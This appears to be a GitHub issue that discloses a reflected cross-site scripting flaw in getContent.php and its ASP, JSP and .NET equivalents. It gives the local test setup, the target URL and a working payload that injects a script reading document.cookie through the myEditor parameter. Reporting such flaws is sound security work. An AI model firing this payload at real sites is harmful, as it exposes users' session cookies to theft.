I found a reflective XSS vulnerability in /php/getContent.php
yundiao opened this issue · 0 comments
yundiao commented
Testing environment: localhost
Windows + firefox + phpStorm + apache2 + php5.4.45
I. Vulnerability analysis
/php/getContent.php
II. Exploit
url:
http://127.0.0.1/php/getcontent.php
payload:
myEditor=<script>alert(document.cookie)</script>
// "E" in the word myEditor must be capitalized.
The same vulnerability exists in all language versions of getContent files.
/asp/getContent.asp
/jsp/getContent.jsp
/net/getContent.ashx
